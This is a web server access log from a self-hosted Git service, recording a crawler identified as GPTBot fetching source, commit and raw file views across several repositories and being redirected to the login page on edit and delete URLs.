-[17/Feb/2026:17:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16704] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" -[17/Feb/2026:17:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9784] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9785] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fappsettings.Development.json" [Client 74.7.227.38] [Length 21423] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:17:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7659] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" -[17/Feb/2026:17:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:17:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" -[17/Feb/2026:17:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:17:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" -[17/Feb/2026:17:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js" -[17/Feb/2026:17:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 17246] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13731] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13986] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" -[17/Feb/2026:17:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" -[17/Feb/2026:17:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15604] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" -[17/Feb/2026:17:09:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Contact.tsx" -[17/Feb/2026:17:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:17:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:17:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:17:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:17:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14410] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:17:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode" -[17/Feb/2026:17:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12007] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode" -[17/Feb/2026:17:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12008] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode" -[17/Feb/2026:17:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10170] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" -[17/Feb/2026:17:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11575] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:09:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:17:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:17:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12206] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" -[17/Feb/2026:17:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:17:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:17:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:17:09:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 11107] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist" -[17/Feb/2026:17:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 